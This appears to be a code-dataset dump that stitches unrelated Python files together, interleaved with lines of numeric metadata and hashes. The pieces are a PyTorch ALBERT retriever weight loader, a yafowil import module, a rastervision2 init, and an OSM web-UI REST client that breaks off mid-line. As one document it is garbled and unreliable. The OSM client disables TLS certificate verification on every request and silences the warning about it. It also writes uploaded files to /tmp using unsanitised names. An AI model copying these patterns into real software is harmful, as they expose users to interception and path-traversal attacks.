named {} found in directory {} or `from_tf` set to False".format( [WEIGHTS_NAME, TF2_WEIGHTS_NAME, TF_WEIGHTS_NAME + ".index"], pretrained_model_name_or_path)) elif os.path.isfile(pretrained_model_name_or_path + ".index"): assert from_tf, "We found a TensorFlow checkpoint at {}, please set from_tf to True to load from this checkpoint".format( pretrained_model_name_or_path + ".index") archive_file = pretrained_model_name_or_path + ".index" # redirect to the cache, if necessary try: resolved_archive_file = cached_path(archive_file, cache_dir=cache_dir, force_download=force_download, proxies=proxies) except EnvironmentError: if pretrained_model_name_or_path in cls.pretrained_model_archive_map: msg = "Couldn't reach server at '{}' to download pretrained weights.".format( archive_file) else: msg = "Model name '{}' was not found in model name list ({}). " \ "We assumed '{}' was a path or url to model weight files named one of {} but " \ "couldn't find any such file at this path or url.".format( pretrained_model_name_or_path, ', '.join(cls.pretrained_model_archive_map.keys()), archive_file, [WEIGHTS_NAME, TF2_WEIGHTS_NAME, TF_WEIGHTS_NAME]) raise EnvironmentError(msg) if resolved_archive_file == archive_file: logger.info("loading weights file {}".format(archive_file)) else: logger.info("loading weights file {} from cache at {}".format( archive_file, resolved_archive_file)) else: resolved_archive_file = None # Instantiate model. model = cls(config, *model_args, **model_kwargs) if state_dict is None and not from_tf: state_dict = torch.load(resolved_archive_file, map_location='cpu') missing_keys = [] unexpected_keys = [] error_msgs = [] if from_tf: if resolved_archive_file.endswith('.index'): # Load from a TensorFlow 1.X checkpoint - provided by original authors model = cls.load_tf_weights(model, config, resolved_archive_file[:-6]) # Remove the '.index' else: # Load from our TensorFlow 2.0 checkpoints try: from transformers import load_tf2_checkpoint_in_pytorch_model model = load_tf2_checkpoint_in_pytorch_model(model, resolved_archive_file, allow_missing_keys=True) except ImportError as e: logger.error("Loading a TensorFlow model in PyTorch, requires both PyTorch and TensorFlow to be installed. Please see " "https://pytorch.org/ and https://www.tensorflow.org/install/ for installation instructions.") raise e else: # Convert old format to new format if needed from a PyTorch state_dict old_keys = [] new_keys = [] for key in state_dict.keys(): new_key = None if 'gamma' in key: new_key = key.replace('gamma', 'weight') if 'beta' in key: new_key = key.replace('beta', 'bias') if key == 'lm_head.decoder.weight': new_key = 'lm_head.weight' if new_key: old_keys.append(key) new_keys.append(new_key) for old_key, new_key in zip(old_keys, new_keys): state_dict[new_key] = state_dict.pop(old_key) # copy state_dict so _load_from_state_dict can modify it metadata = getattr(state_dict, '_metadata', None) # print('orig state dict', state_dict.keys(), len(state_dict)) customized_state_dict = collections.OrderedDict() for k, v in state_dict.items(): k_split = k.split('.') if k_split[0] == 'albert': k_split[0] = 'query_encoder' customized_state_dict['.'.join(k_split)] = v k_split[0] = 'passage_encoder' customized_state_dict['.'.join(k_split)] = v if len(customized_state_dict) == 0: # loading from our trained model state_dict = state_dict.copy() # print('using orig state dict', state_dict.keys()) else: # loading from original bert model state_dict = customized_state_dict.copy() # print('using custome state dict', state_dict.keys()) query_emb_key_name = 'query_encoder.embeddings.token_type_embeddings.weight' passage_emb_key_name = 'passage_encoder.embeddings.token_type_embeddings.weight' if use_pos_embedding and query_emb_key_name in state_dict.keys() and config is not None: print("embedding size {}".format(config.embedding_size)) print("proj size {}".format(config.proj_size)) query_default_emb = state_dict[query_emb_key_name] prev_size = query_default_emb.shape[0] query_default_emb = query_default_emb.resize_((max_history_turns, config.embedding_size)) query_default_emb[prev_size:, :] = torch.zeros(max_history_turns-prev_size, config.embedding_size) print("query default emb shape {}".format(query_default_emb.shape)) state_dict[query_emb_key_name] = query_default_emb if passage_emb_key_name in state_dict.keys(): state_dict[passage_emb_key_name] = query_default_emb # print('modified state dict', state_dict.keys(), len(state_dict)) if metadata is not None: state_dict._metadata = metadata # PyTorch's `_load_from_state_dict` does not copy parameters in a module's descendants # so we need to apply the function recursively. def load(module, prefix=''): local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {}) module._load_from_state_dict( state_dict, prefix, local_metadata, True, missing_keys, unexpected_keys, error_msgs) for name, child in module._modules.items(): if child is not None: load(child, prefix + name + '.') # Make sure we are able to load base models as well as derived models (with heads) start_prefix = '' model_to_load = model load(model_to_load, prefix='') if len(missing_keys) > 0: logger.info("Weights of {} not initialized from pretrained model: {}".format( model.__class__.__name__, missing_keys)) if len(unexpected_keys) > 0: logger.info("Weights from pretrained model not used in {}: {}".format( model.__class__.__name__, unexpected_keys)) if len(error_msgs) > 0: raise RuntimeError('Error(s) in loading state_dict for {}:\n\t{}'.format( model.__class__.__name__, "\n\t".join(error_msgs))) model.tie_weights() # make sure word embedding weights are still tied if needed # Set model in evaluation mode to desactivate DropOut modules by default model.eval() if output_loading_info: loading_info = {"missing_keys": missing_keys, "unexpected_keys": unexpected_keys, "error_msgs": error_msgs} return model, loading_info return model class AlbertWithHAMForRetrieverOnlyPositivePassage(AlbertForRetrieverOnlyPositivePassage): def __init__(self, config): super(AlbertWithHAMForRetrieverOnlyPositivePassage, self).__init__(config) self.config = config self.ham_linear_layer = nn.Linear(config.proj_size, 1) self.init_weights() def preprocess_sub_batch(self, query_input_ids, query_attention_mask, query_token_type_ids, use_fine_grained_attention=False, use_soft_attention_weights=True, device=None): output = torch.empty(len(query_input_ids), self.config.proj_size).to(device) for i in range(len(query_input_ids)): query_outputs = self.query_encoder(query_input_ids[i], attention_mask=query_attention_mask[i], # (11, 512) token_type_ids=query_token_type_ids[i]) query_pooled_output = query_outputs[1] # cls token (batch size, CLS representation size) query_pooled_output = self.dropout(query_pooled_output) # apply dropout to CLS representation query_rep = self.query_proj(query_pooled_output) # sub_batch_size, proj_size (number of queries, cls representation for each query) if use_soft_attention_weights: cls_weights = self.ham_linear_layer(query_rep) # cls weights: (sub_batch_size, 1) cls_weights = torch.squeeze(cls_weights, dim=-1) alphas = torch.nn.functional.softmax(cls_weights, dim=0) # calculate probabilities for history attention scores. else: alphas = torch.mul(torch.ones(query_rep.shape[0]), 1.0/(query_rep.shape[0])).to(device) # token representation if use_fine_grained_attention: alphas = alphas.view(alphas.shape[0], 1, 1) query_sequence_tokens = query_outputs[0] query_sequence_tokens = self.dropout(query_sequence_tokens) query_sequence_reps = self.query_proj(query_sequence_tokens) dense_representation = torch.sum(query_sequence_reps * alphas, dim=0) dense_representation = torch.mean(dense_representation, dim=0, keepdim=True) else: alphas = alphas.view(alphas.shape[0], 1) dense_representation = torch.sum(query_rep * alphas, dim=0, keepdim=True) output[i] = dense_representation return output def forward(self, query_input_ids=None, query_attention_mask=None, query_token_type_ids=None, passage_input_ids=None, passage_attention_mask=None, passage_token_type_ids=None, retrieval_label=None, query_rep=None, passage_rep=None, use_fine_grained_attention=False, use_soft_attention_weights=True, device=None): outputs = () if query_input_ids is not None and len(query_input_ids) > 0: dense_representation = self.preprocess_sub_batch(query_input_ids, query_attention_mask, query_token_type_ids, use_fine_grained_attention, use_soft_attention_weights, device) outputs = (dense_representation, ) + outputs if passage_input_ids is not None: passage_outputs = self.passage_encoder(passage_input_ids, attention_mask=passage_attention_mask, token_type_ids=passage_token_type_ids) passage_pooled_output = passage_outputs[1] # passage CLS representation passage_pooled_output = self.dropout(passage_pooled_output) passage_rep = self.passage_proj(passage_pooled_output) # batch_size, proj_size # print(passage_rep[:, 0]) outputs = (passage_rep,) + outputs if query_input_ids is not None and len(query_input_ids) > 0 and passage_input_ids is not None: passage_rep_t = passage_rep.transpose(0, 1) # proj_size, batch_size (128, batch_size) retrieval_logits = torch.matmul(query_rep, passage_rep_t) # batch_size, batch_size retrieval_label = torch.arange(query_rep.size(0), device=query_rep.device, dtype=retrieval_label.dtype) # batch size retrieval_loss_fct = CrossEntropyLoss() retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) outputs = (retrieval_loss,) + outputs if query_input_ids is not None and len(query_input_ids) > 0 and passage_rep is not None and retrieval_label is not None and len( passage_rep.size()) == 3: dense_representation = self.preprocess_sub_batch(query_input_ids, query_attention_mask, query_token_type_ids, use_fine_grained_attention, use_soft_attention_weights, device) batch_size, num_blocks, proj_size = passage_rep.size() query_rep = dense_representation.unsqueeze(-1) # query_rep (batch_size, proj_size, 1) query_rep = query_rep.expand(batch_size, self.proj_size, num_blocks) # batch_size, proj_size, num_blocks) query_rep = query_rep.transpose(1, 2) # query_rep (batch_size, num_blocks, proj_size) retrieval_logits = query_rep * passage_rep # batch_size, num_blocks, proj_size retrieval_logits = torch.sum(retrieval_logits, dim=-1) # batch_size, num_blocks retrieval_probs = F.softmax(retrieval_logits, dim=1) retrieval_label = retrieval_label.squeeze(-1).argmax(dim=1) retrieval_loss_fct = CrossEntropyLoss() retrieval_loss = retrieval_loss_fct(retrieval_logits, retrieval_label) outputs = (retrieval_loss,) + outputs return outputs class Pipeline(nn.Module): def __init__(self): super(Pipeline, self).__init__() self.reader = None self.retriever = None
55.252399
144
0.626631
6,801
57,573
4.991619
0.060579
0.021209
0.015553
0.025981
0.913102
0.904206
0.892866
0.882909
0.875191
0.873071
0
0.005442
0.291439
57,573
1,041
145
55.305476
0.826739
0.220763
0
0.835694
0
0.005666
0.064205
0.005343
0
0
0
0
0.002833
1
0.028329
false
0.110482
0.024079
0
0.080737
0.007082
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
8
f1ddf1128b637063495531cd751ffe0b85ab5263
91
py
Python
src/yafowil/yaml/__init__.py
conestack/yafowil.yaml
9a5d3b808f85a1c204c31219f957b7a77cd23b8e
[ "BSD-2-Clause" ]
2
2019-07-09T12:47:21.000Z
2019-11-17T10:24:33.000Z
src/yafowil/yaml/__init__.py
conestack/yafowil.yaml
9a5d3b808f85a1c204c31219f957b7a77cd23b8e
[ "BSD-2-Clause" ]
3
2018-04-16T09:53:15.000Z
2019-06-24T14:45:06.000Z
src/yafowil/yaml/__init__.py
conestack/yafowil.yaml
9a5d3b808f85a1c204c31219f957b7a77cd23b8e
[ "BSD-2-Clause" ]
1
2019-06-12T06:50:15.000Z
2019-06-12T06:50:15.000Z
from yafowil.yaml.parser import YAMLParser from yafowil.yaml.parser import parse_from_YAML
30.333333
47
0.868132
14
91
5.5
0.5
0.285714
0.38961
0.545455
0.701299
0
0
0
0
0
0
0
0.087912
91
2
48
45.5
0.927711
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
7b1b967ed627b9e3fab4817057b1a854b9c7a7c9
364
py
Python
rastervision2/pytorch_backend/__init__.py
csaybar/raster-vision
617ca15f64e3b8a391432306a743f7d0dfff352f
[ "Apache-2.0" ]
1
2020-10-10T12:32:43.000Z
2020-10-10T12:32:43.000Z
rastervision2/pytorch_backend/__init__.py
csaybar/raster-vision
617ca15f64e3b8a391432306a743f7d0dfff352f
[ "Apache-2.0" ]
null
null
null
rastervision2/pytorch_backend/__init__.py
csaybar/raster-vision
617ca15f64e3b8a391432306a743f7d0dfff352f
[ "Apache-2.0" ]
1
2021-12-02T08:07:21.000Z
2021-12-02T08:07:21.000Z
# flake8: noqa from rastervision2.pytorch_backend.pytorch_chip_classification_config import * from rastervision2.pytorch_backend.pytorch_chip_classification import * from rastervision2.pytorch_backend.pytorch_semantic_segmentation_config import * from rastervision2.pytorch_backend.pytorch_semantic_segmentation import * def register_plugin(registry): pass
33.090909
80
0.873626
41
364
7.390244
0.414634
0.224422
0.316832
0.409241
0.851485
0.851485
0.851485
0.422442
0
0
0
0.014925
0.07967
364
10
81
36.4
0.889552
0.032967
0
0
0
0
0
0
0
0
0
0
0
1
0.166667
false
0.166667
0.666667
0
0.833333
0
0
0
0
null
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
1
0
1
0
0
9
9e9973cf341425c200c2c2c1040ca32f18c8427a
75,712
py
Python
lib/osm/osmclient/clientv2.py
TCSOSM-20/LW-UI
70c3331278f71d3b22fc3a090d526b4b8106d155
[ "Apache-2.0" ]
null
null
null
lib/osm/osmclient/clientv2.py
TCSOSM-20/LW-UI
70c3331278f71d3b22fc3a090d526b4b8106d155
[ "Apache-2.0" ]
null
null
null
lib/osm/osmclient/clientv2.py
TCSOSM-20/LW-UI
70c3331278f71d3b22fc3a090d526b4b8106d155
[ "Apache-2.0" ]
null
null
null
# # Copyright 2018 EveryUP Srl # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import errno import requests import logging import tarfile import yaml import StringIO from lib.util import Util import hashlib import os import re from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) logging.basicConfig(level=logging.INFO) log = logging.getLogger('helper.py') logging.getLogger("urllib3").setLevel(logging.INFO) class Client(object): def __init__(self): self._token_endpoint = 'admin/v1/tokens' self._user_endpoint = 'admin/v1/users' self._host = os.getenv('OSM_SERVER', "localhost") self._so_port = 9999 self._base_path = 'https://{0}:{1}/osm'.format( self._host, self._so_port) def auth(self, args): result = {'error': True, 'data': ''} token_url = "{0}/{1}".format(self._base_path, self._token_endpoint) headers = {"Content-Type": "application/yaml", "accept": "application/json"} try: r = requests.post(token_url, json=args, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def switch_project(self, args): result = {'error': True, 'data': ''} token_url = "{0}/{1}".format(self._base_path, self._token_endpoint) headers = {"Content-Type": "application/yaml", "accept": "application/json"} try: r = requests.post(token_url, json=args, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def role_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/roles".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def role_create(self, token, role_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/roles".format(self._base_path) try: r = requests.post(_url, json=role_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def role_update(self, token, role_id, role_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/roles/{1}".format(self._base_path, role_id) try: r = requests.patch(_url, json=role_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def role_delete(self, token, id, force=None): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} query_path = '' if force: query_path = '?FORCE=true' _url = "{0}/admin/v1/roles/{1}{2}".format( self._base_path, id, query_path) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def role_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/roles/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def user_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/users".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def user_create(self, token, user_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/users".format(self._base_path) try: r = requests.post(_url, json=user_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def user_update(self, token, id, user_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/users/{1}".format(self._base_path, id) try: r = requests.patch(_url, json=user_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def user_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/users/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def get_user_info(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/users/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def get_domains(self, token): result = {'error': False, 'data': ''} headers = {"accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/domains".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def get_projects(self, token, uuids): result = {'error': False, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} projects = [] try: for uuid in uuids: _url = "{0}/admin/v1/projects/{1}".format( self._base_path, uuid) r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) if r.status_code not in (200, 201, 202, 204): raise Exception() projects.append(Util.json_loads_byteified(r.text)) except Exception as e: log.exception(e) result['error'] = True result['data'] = str(e) return result result['data'] = projects return result def project_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/projects".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def project_get(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/projects/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def project_create(self, token, project_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/projects".format(self._base_path) try: r = requests.post(_url, json=project_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def project_edit(self, token, id, project_data): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/projects/{1}".format(self._base_path, id) try: r = requests.patch(_url, json=project_data, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False return result def project_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/admin/v1/projects/{1}".format(self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False else: result['data'] = Util.json_loads_byteified(r.text) return result def nst_details(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nst/v1/netslice_templates/{1}".format(self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nst_content(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/json", "accept": "text/plain", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nst/v1/netslice_templates/{1}/nst".format( self._base_path, id) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json2yaml(yaml.load(str(r.text))) return result def nst_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nst/v1/netslice_templates".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nsd_list(self, token, filter=None): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} query_path = '' if filter: query_path = '?_admin.type='+filter _url = "{0}/nsd/v1/ns_descriptors_content{1}".format( self._base_path, query_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def vnfd_list(self, token, filter=None): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} query_path = '' if filter: query_path = '?_admin.type='+filter _url = "{0}/vnfpkgm/v1/vnf_packages_content{1}".format( self._base_path, query_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nsi_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsilcm/v1/netslice_instances".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def ns_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/ns_instances_content".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def vnf_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nslcm/v1/vnfrs".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def pdu_list(self, token): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/pdu/v1/pdu_descriptors".format(self._base_path) try: r = requests.get(_url, params=None, verify=False, stream=True, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nst_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nst/v1/netslice_templates/{1}?FORCE=True".format( self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False return result def nsd_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsd/v1/ns_descriptors_content/{1}".format( self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r: result['error'] = False if r.status_code != requests.codes.no_content: result['data'] = Util.json_loads_byteified(r.text) return result def vnfd_delete(self, token, id): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/yaml", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/vnfpkgm/v1/vnf_packages_content/{1}".format( self._base_path, id) try: r = requests.delete(_url, params=None, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r: result['error'] = False if r.status_code != requests.codes.no_content: result['data'] = Util.json_loads_byteified(r.text) return result def nst_onboard(self, token, template): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nst/v1/netslice_templates_content".format(self._base_path) try: fileName, fileExtension = os.path.splitext(template.name) if fileExtension == '.gz': headers["Content-Type"] = "application/gzip" else: headers["Content-Type"] = "application/yaml" r = requests.post(_url, data=template, verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nsd_onboard(self, token, package): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} with open('/tmp/' + package.name, 'wb+') as destination: for chunk in package.chunks(): destination.write(chunk) headers['Content-File-MD5'] = self.md5( open('/tmp/' + package.name, 'rb')) _url = "{0}/nsd/v1/ns_descriptors_content/".format(self._base_path) try: r = requests.post(_url, data=open( '/tmp/' + package.name, 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def vnfd_onboard(self, token, package): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} with open('/tmp/' + package.name, 'wb+') as destination: for chunk in package.chunks(): destination.write(chunk) headers['Content-File-MD5'] = self.md5( open('/tmp/' + package.name, 'rb')) _url = "{0}/vnfpkgm/v1/vnf_packages_content".format(self._base_path) try: r = requests.post(_url, data=open( '/tmp/' + package.name, 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['error'] = False result['data'] = Util.json_loads_byteified(r.text) return result def nsd_create_pkg_base(self, token, pkg_name): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/nsd/v1/ns_descriptors_content/".format(self._base_path) try: self._create_base_pkg('nsd', pkg_name) headers['Content-Filename'] = pkg_name + '.tar.gz' r = requests.post(_url, data=open( '/tmp/' + pkg_name + '.tar.gz', 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['data'] = r.json() result['error'] = False if r.status_code == requests.codes.conflict: result['data'] = "Invalid ID." return result def vnfd_create_pkg_base(self, token, pkg_name): result = {'error': True, 'data': ''} headers = {"Content-Type": "application/gzip", "accept": "application/json", 'Authorization': 'Bearer {}'.format(token['id'])} _url = "{0}/vnfpkgm/v1/vnf_packages_content".format(self._base_path) try: self._create_base_pkg('vnfd', pkg_name) r = requests.post(_url, data=open( '/tmp/' + pkg_name + '.tar.gz', 'rb'), verify=False, headers=headers) except Exception as e: log.exception(e) result['data'] = str(e) return result if r.status_code in (200, 201, 202, 204): result['data'] = r.json() result['error'] = False if r.status_code == 